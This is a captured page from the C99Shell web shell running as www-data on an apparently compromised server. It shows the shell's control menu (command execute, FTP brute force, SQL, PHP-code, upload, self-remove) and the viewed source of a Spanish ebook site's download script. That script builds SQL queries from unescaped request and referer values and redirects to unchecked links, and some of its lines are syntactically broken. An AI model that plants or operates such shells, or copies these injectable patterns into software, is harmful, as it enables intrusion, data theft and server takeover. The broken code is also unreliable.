!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bajando3.php (7.12 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<style type=text/css>
BODY{
    font-family: arial, verdana, helvetica;
    float:none;
}
#tabla1{
    border: 1px solid #1E679A;
    width: 450px;
}
#cabtab1{
    background-color: #1E679A;
    font-weight: bold;
    color: #ffffff;
    padding: 2 2 2 2px;
}
#cuerpotab1{
    padding: 4 4 4 4px;
    background-color: #ffffcc;
    float:right;
}
#cuerpotab2{
    padding: 4 4 4 4px;
    background-color: #ffffdd;
    float:right;
}
</style>
</head>


<body>
<?php 
include "conn.php";  
include "./classes/class.log.php"


$key="w2kpro";  
 $crypt = new Encriptor($key);    
 $external = new Encriptor($key); 
 $plano=  new Encriptor($key);
$control= new control();  
$anonimo=true;
$crack=false;


$link=$external->decrypt($_REQUEST['link']);   
$aArray_explode=explode("/",$link);
$aArray_id=explode("-",$aArray_explode[count($aArray_explode)-1]);
$control->idbook=$aArray_id[0];
$control->busca_id();


if ($control->usuario=="ansfdaonimo"){
    echo "<pre>";
    print_r($aArray_id); print_r($aArray_explode);
    var_dump($control);
    die();
}


// a�adido... si es de estados unidos, nos lo cargamos

if ((trim($control->pais)=='US' or $control->usuario=='djyanka' ) and  (!strpos("--".$link,"adf.ly") or strpos("--".$link,"linkbu") and   (!strpos("--".$link,"cur.lv")))) { 
    
?>
    <br />
        
    
            <center><h2>DCMA File forbidden!</h2><br>
            <h3>The download of this file is forbidden from USA or through  VPN or proxy with USA's ip</h3><br> 
            <a href="http://copyright.gov"><img src="http://theiptrader.com/wp-content/uploads/2011/10/f1H4SJLr-300x109.jpg" /></a>
        
</center>
        
        <?
                    $query="insert estadistica (id_book,
                 fecha,
                 ip ,
                 titulo,
                 autor,
                 accion,
                 nick,
                 pais,
                 link,
                 referer) 
                 values(
                5
                ,'".$control->fecha.
                "','"."".$control->ip.
                "','".$control->titulo.
                "','".$control->autor.  
                "','".'USA-removed'.
                "','".$control->usuario.
                "','".$control->pais
                "','".$link.
                "','".$_SERVER['HTTP_REFERER'].        
                 "')"
                mysql_query($query,$conn);
        echo "</body></html>";

        die();
        
}
    
     // para que pirule los redirectores)     strpos("--".$link,"adf.ly"
    if (strpos("--".$link,"adf.ly") or strpos("--".$link,"linkbu")    or strpos("--".$link,"cur.lv")){
         $accion="_adfly";
        if (strpos("--".$link,"linkbu"))$accion="_linkbucks";
        
        // permitimos la descarga!
                     $query="insert estadistica (id_book,
 fecha,
 ip ,
 titulo,
 autor,
 accion,
 nick,
 pais,
 referer) 
 values(999999
,'".$control->fecha.
"','".$control->ip.
"','".$control->titulo.
"','".$control->autor.  
"','".$accion.
"','".$control->usuario.
"','".$control->pais
"','".$_SERVER['HTTP_REFERER']."->".$control->idbook.
 "')"
 
 mysql_query($query,$conn);   
        
           

          // y esto es la descarga en si.
        header('Location: '.$link);
       // echo "$query";
        //echo "<br>$link";
        ?>
        <center><br><a href='javascript:history.back()' style="text-decoration:none"><img src=volver.png border=0></img></a>

        <?php
die();        
    }        
        
        
        
    
    
    
    
    





//  Debe ser un referer nuestro, y si no, a tomar por el culo ... porcentualmente ;-)
if (!strpos($_SERVER['HTTP_REFERER'],'claibu') and !strpos($_SERVER['HTTP_REFERER'],'torrebruno') and !strpos($_SERVER['HTTP_REFERER'],'forococh')){
    
    
    
//si tiene descarga a 0, mensajito y a correr         

    if ($control->descargas_pendientes <=0){
            ?>
        <br />
        <center>
        <div id=tabla1>
        <div id=cabtab1>
        <? echo "usuario ".$control->usuario;?> 
        </div>
        <div id=cuerpotab1>
        <?if ($control->usuario=='anonimo'){
            echo "Los usuarios an�nimos no est�n autorizados a la descarga de libros<br><br>
            Registrate <b><A HREF='HTTP://www.papyrefb2.net/phpbb3/index.php'>AQUI</a><b><br>
            <a href='http://papyrefb2.net'><img src='http://papyrefb2.net/frames/logo_papyrefb2.net.jpg?324' width=100% alt='Logo de papyrefb2.net'></a>";
            
            // sql, usuario anonimo intent� una descarga
            
            $query="insert estadistica (id_book,
                 fecha,
                 ip ,
                 titulo,
                 autor,
                 accion,
                 nick,
                 pais,
                 link,
                 referer) 
                 values(
                5
                ,'".$control->fecha.
                "','"."".$control->ip.
                "','".$control->titulo.
                "','".$control->autor.  
                "','".'denegado'.
                "','".$control->usuario.
                "','".$control->pais
                "','".$link.
                "','".$_SERVER['HTTP_REFERER'].        
                 "')"
                mysql_query($query,$conn);
                
            
            
            
        }else{
             echo "has agotado tus descargas para el d�a de hoy";
             
             // sql usuario identificado, ha agotado sus descargas
             
             $query="insert estadistica (id_book,
 fecha,
 ip ,
 titulo,
 autor,
 accion,
 nick,
 pais,
 referer) 
 values(
 ".$control->idbook.
",'".$control->fecha.
"','".$control->ip.
"','".$control->titulo.
"','".$control->autor.  
"','".'limite'.
"','".$control->usuario.
"','".$control->pais
"','".$_SERVER['HTTP_REFERER'].
 "')";   
                mysql_query($query,$conn);
             
        }
        ?>
        
        </div>
        </div>
        </center>
        <?


        echo "</body></html>";

        die();
    }else{
        // tiene descargas todavia
        
        //aqui ir�a el sql.
                     $query="insert estadistica (id_book,
 fecha,
 ip ,
 titulo,
 autor,
 accion,
 nick,
 pais,
 referer) 
 values(
 ".$control->idbook.
",'".$control->fecha.
"','".$control->ip.
"','".$control->titulo.
"','".$control->autor.  
"','".'descarga'.
"','".$control->usuario.
"','".$control->pais
"','".$_SERVER['HTTP_REFERER'].
 "')"
 
 mysql_query($query,$conn);   
        
                

          // y esto es la descarga en si.
        header('Location: '.$link);
        ?>
        <center><br><a href='javascript:history.back()' style="text-decoration:none"><img src=volver.png border=0></img></a>

        <?php
    }
    
}else{
    
    
    
    // aqui iria el sql, para ver cuantos hotlinking existen     
    
    
                         $query="insert estadistica (id_book,
 fecha,
 ip ,
 titulo,
 autor,
 accion,
 nick,
 pais,
 referer) 
 values(
1
,'".$control->fecha.
"','".$control->ip.
"','".$control->titulo.
"','".$control->autor.  
"','".'hotlink'.
"','".$control->usuario.
"','".$control->pais
"','".$_SERVER['HTTP_REFERER'].
 "')";    
  mysql_query($query,$conn);   
    
    ?>
    <br />
        
        <div id=tabla1>
        <div id=cabtab1>
        <? echo "usuario ".$control->usuario;?> 
        </div>
        <div id=cuerpotab2>
        <?    echo "No permitimos el hotlinking de ficheros desde servidores 
        externos, debido al enorme consumo de ancho de banda 
        de los �ltimos tiempos. <br><br> El fichero que 
            has pedido est� alojado en <b><a href='http://papyrefb2.net'>http://www.papyrefb2.net</a></b><br><br>
            Registrate <b><A HREF='HTTP://www.papyrefb2.net/phpbb3/index.php'>AQUI</a><b><br>
            <a href='http://papyrefb2.net'><img src='http://papyrefb2.net/frames/logo_papyrefb2.net.jpg?324' width=100% alt='Logo de papyrefb2.net'></a>";
        
        ?>
        </div>
        </div>
        
        <?
    


    
}
    

?>










:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0046 ]--